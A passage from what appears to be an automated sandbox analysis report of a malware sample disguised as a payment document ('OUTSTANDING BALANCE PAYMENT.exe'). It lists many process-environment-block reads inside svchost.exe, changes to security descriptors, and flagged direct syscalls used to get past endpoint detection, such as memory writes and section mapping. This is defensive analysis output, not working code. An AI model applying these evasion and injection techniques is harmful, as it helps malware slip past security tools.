                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]2_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]2_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]2_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]2_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]2_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]2_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov ecx, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002BA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_002BA66C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002A81AC
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_002A8189 SetUnhandledExceptionFilter,0_2_002A8189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
